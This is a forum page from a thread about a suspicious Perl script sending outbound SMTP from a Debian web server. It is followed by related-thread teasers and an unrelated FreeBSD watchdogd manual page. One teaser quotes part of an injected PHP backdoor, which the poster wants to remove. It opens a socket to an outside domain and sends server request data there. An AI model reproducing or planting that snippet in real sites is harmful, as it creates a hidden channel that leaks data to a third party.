Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: Malicious perl script
Operating Systems Linux Debian Malicious perl script Post 302992395 by drysdalk on Friday 24th of February 2017 11:33:08 AM
Old 02-24-2017
Hi,

I suspect these are two different issues. So far you have seen evidence of attempted brute-forcing of your WordPress logins, and you also saw a Perl script establishing a variety of outbound SMTP connections back at the very start of this thread.

It is entirely possible that the two are related, but equally they may not be. There's always a steady trickle of would-be brute-forcing and exploit scanning in the logs of pretty much every Web server on the Internet, more or less. If your WordPress installation is genuinely secure, these should be nothing to worry about. More sinister is the Perl script.

If in the output of ps and top right now you're not able to see any errant Perl scripts, and if there is nothing Perl-related in any of your Web logs, then there's not much more you can do at this point to track down that Perl script.

What you can say for sure is that your server was clearly running an unexpected Perl script that appeared to be establishing a variety of outbound SMTP connections, and it must have come from somewhere. And if that somewhere wasn't you, then you do definitely have a security issue you still need to get to the bottom of.
 

7 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

remove malicious codes from a file

Hello, Please advise a script/command to remove the following line for a file <?php error_reporting(0); $fn = "googlesindication.cn"; $fp = fsockopen($fn, 80, $errno, $errstr, 15); if (!$fp) { } else { $query='site='.$_SERVER; $out = "GET /links.php?".$query." HTTP/1.1\r\n"; ... (5 Replies)
Discussion started by: fed.linuxgossip
5 Replies

2. Shell Programming and Scripting

Anti-malicious files and viruses

Hello I ask you how to make a Anti-malicious files and viruses Or if one of you a small example of the work on the same place and I hope my request I want a small patch or the process of examination Virus http://www.google.jo/images/cleardot.gif ---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies

3. Cybersecurity

How to analyze malicious code

A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work: CSI:Internet - Alarm at the pizza service CSI:Internet - The image of death CSI:Internet - PDF timebomb CSI:Internet -... (0 Replies)
Discussion started by: pludi
0 Replies

4. Shell Programming and Scripting

calling a perl script with arguments from a parent perl script

I am trying to run a perl script which needs input arguments from a parent perl script, but doesn't seem to work. Appreciate your help in this regard. From parent.pl $input1=123; $input2=abc; I tried calling it with system("/usr/bin/perl child.pl $input1 $input2"); and `perl... (1 Reply)
Discussion started by: grajp002
1 Replies

5. Shell Programming and Scripting

Perl : embedding java script with cgi perl script

Hi All, I am aware that html tags can be embedded in cgi script as below.. In the same way is it possible to embed the below javascript in perl cgi script ?? print("<form action="action.htm" method="post" onSubmit="return submitForm(this.Submitbutton)">"); print("<input type = "text"... (1 Reply)
Discussion started by: scriptscript
1 Replies

6. Shell Programming and Scripting

Malicious pl script, what does it do

Hello, i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin: Posting links to pastebin scripts are forbidden at this site. Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies

7. Programming

PERL: In a perl-scripttTrying to execute another perl-script that SETS SOME VARIABLES !

I have reviewed many examples on-line about running another process (either PERL or shell command or a program), but do not find any usefull for my needs way. (Reviewed and not useful the system(), 'back ticks', exec() and open()) I would like to run another PERL-script from first one, not... (1 Reply)
Discussion started by: alex_5161
1 Replies

LEARN ABOUT FREEBSD

watchdogd

WATCHDOGD(8)						    BSD System Manager's Manual 					      WATCHDOGD(8)

NAME

     watchdogd -- watchdog daemon

SYNOPSIS

     watchdogd [-dnSw] [--debug] [--softtimeout] [--softtimeout-action action] [--pretimeout timeout] [--pretimeout-action action] [-e cmd]
	       [-I file] [-s sleep] [-t timeout] [-T script_timeout]

DESCRIPTION

     The watchdogd utility interfaces with the kernel's watchdog facility to ensure that the system is in a working state.  If watchdogd is unable
     to interface with the kernel over a specific timeout, the kernel will take actions to assist in debugging or restarting the computer.

     If -e cmd is specified, watchdogd will attempt to execute this command with system(3), and only if the command returns with a zero exit code
     will the watchdog be reset.  If -e cmd is not specified, the daemon will perform a trivial file system check instead.

     The -n argument 'dry-run' will cause watchdog not to arm the system watchdog and instead only run the watchdog function and report on fail-
     ures.  This is useful for developing new watchdogd scripts as the system will not reboot if there are problems with the script.

     The -s sleep argument can be used to control the sleep period between each execution of the check and defaults to 10 seconds.

     The -t timeout specifies the desired timeout period in seconds.  The default timeout is 128 seconds.

     One possible circumstance which will cause a watchdog timeout is an interrupt storm.  If this occurs, watchdogd will no longer execute and
     thus the kernel's watchdog routines will take action after a configurable timeout.

     The -T script_timeout specifies the threshold (in seconds) at which the watchdogd will complain that its script has run for too long.  If
     unset script_timeout defaults to the value specified by the -s sleep option.

     Upon receiving the SIGTERM or SIGINT signals, watchdogd will first instruct the kernel to no longer perform watchdog checks and then will
     terminate.

     The watchdogd utility recognizes the following runtime options:

     -I file			     Write the process ID of the watchdogd utility in the specified file.

     -d --debug 		     Do not fork.  When this option is specified, watchdogd will not fork into the background at startup.

     -S 			     Do not send a message to the system logger when the watchdog command takes longer than expected to execute.
				     The default behaviour is to log a warning via the system logger with the LOG_DAEMON facility, and to output a
				     warning to standard error.

     -w 			     Complain when the watchdog script takes too long.	This flag will cause watchdogd to complain when the amount
				     of time to execute the watchdog script exceeds the threshold of 'sleep' option.

     --pretimeout timeout	     Set a "pretimeout" watchdog.  At "timeout" seconds before the watchdog will fire attempt an action.  The
				     action is set by the --pretimeout-action flag.  The default is just to log a message (WD_SOFT_LOG) via
				     log(9).

     --pretimeout-action action      Set the timeout action for the pretimeout.  See the section Timeout Actions.

     --softtimeout		     Instead of arming the various hardware watchdogs, only use a basic software watchdog.  The default action is
				     just to log(9) a message (WD_SOFT_LOG).

     --softtimeout-action action     Set the timeout action for the softtimeout.  See the section Timeout Actions.

Timeout Actions
     The following timeout actions are available via the --pretimeout-action and --softtimeout-action flags:

     panic   Call panic(9) when the timeout is reached.

     ddb     Enter the kernel debugger via kdb_enter(9) when the timeout is reached.

     log     Log a message using log(9) when the timeout is reached.

     printf  call the kernel printf(9) to display a message to the console and dmesg(8) buffer.

     Actions can be combined in a comma separated list as so: log,printf which would both printf(9) and log(9) which will send messages both to
     dmesg(8) and the kernel log(4) device for syslog(8).

FILES

     /var/run/watchdogd.pid

EXAMPLES

   Debugging watchdogd and/or your watchdog script.
     This is a useful recipe for debugging watchdogd and your watchdog script.

     (Note that ^C works oddly because watchdogd calls system(3) so the first ^C will terminate the "sleep" command.)

     Explanation of options used:
	   1.	Set Debug on (--debug)
	   2.	Set the watchdog to trip at 30 seconds. (-t 30)
	   3.	Use of a softtimeout:
		      3.1.   Use a softtimeout (do not arm the hardware watchdog).  (--softtimeout)
		      3.2.   Set the softtimeout action to do both kernel printf(9) and log(9) when it trips.  (--softtimeout-action log,printf)
	   4.	Use of a pre-timeout:
		      4.1.   Set a pre-timeout of 15 seconds (this will later trigger a panic/dump).  (--pretimeout 15)
		      4.2.   Set the action to also kernel printf(9) and log(9) when it trips.	(--pretimeout-action log,printf)
	   5.	Use of a script:
		      5.1.   Run "sleep 60" as a shell command that acts as the watchdog (-e 'sleep 60')
		      5.2.   Warn us when the script takes longer than 1 second to run (-w)

     watchdogd --debug -t 30 
       --softtimeout --softtimeout-action log,printf 
       --pretimeout 15 --pretimeout-action log,printf 
       -e 'sleep 60' -w

   Production use of example
	   1.	Set hard timeout to 120 seconds (-t 120)
	   2.	Set a panic to happen at 60 seconds (to trigger a crash(8) for dump analysis):
		      2.1.   Use of pre-timeout (--pretimeout 60)
		      2.2.   Specify pre-timeout action (--pretimeout-action log,printf,panic )
	   3.	Use of a script:
		      3.1.   Run your script (-e '/path/to/your/script 60')
		      3.2.   Log if your script takes a longer than 15 seconds to run time. (-w -T 15)

     watchdogd	-t 120 
       --pretimeout 60 --pretimeout-action log,printf,panic 
       -e '/path/to/your/script 60' -w -T 15

SEE ALSO

     watchdog(4), watchdog(8), watchdog(9)

HISTORY

     The watchdogd utility appeared in FreeBSD 5.1.

AUTHORS

     The watchdogd utility and manual page were written by Sean Kelly <smkelly@FreeBSD.org> and Poul-Henning Kamp <phk@FreeBSD.org>.

     Some contributions made by Jeff Roberson <jeff@FreeBSD.org>.

     The pretimeout and softtimeout action system was added by Alfred Perlstein <alfred@freebsd.org>.

BSD
								 November 16, 2014							       BSD
All times are GMT -4. The time now is 06:27 AM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy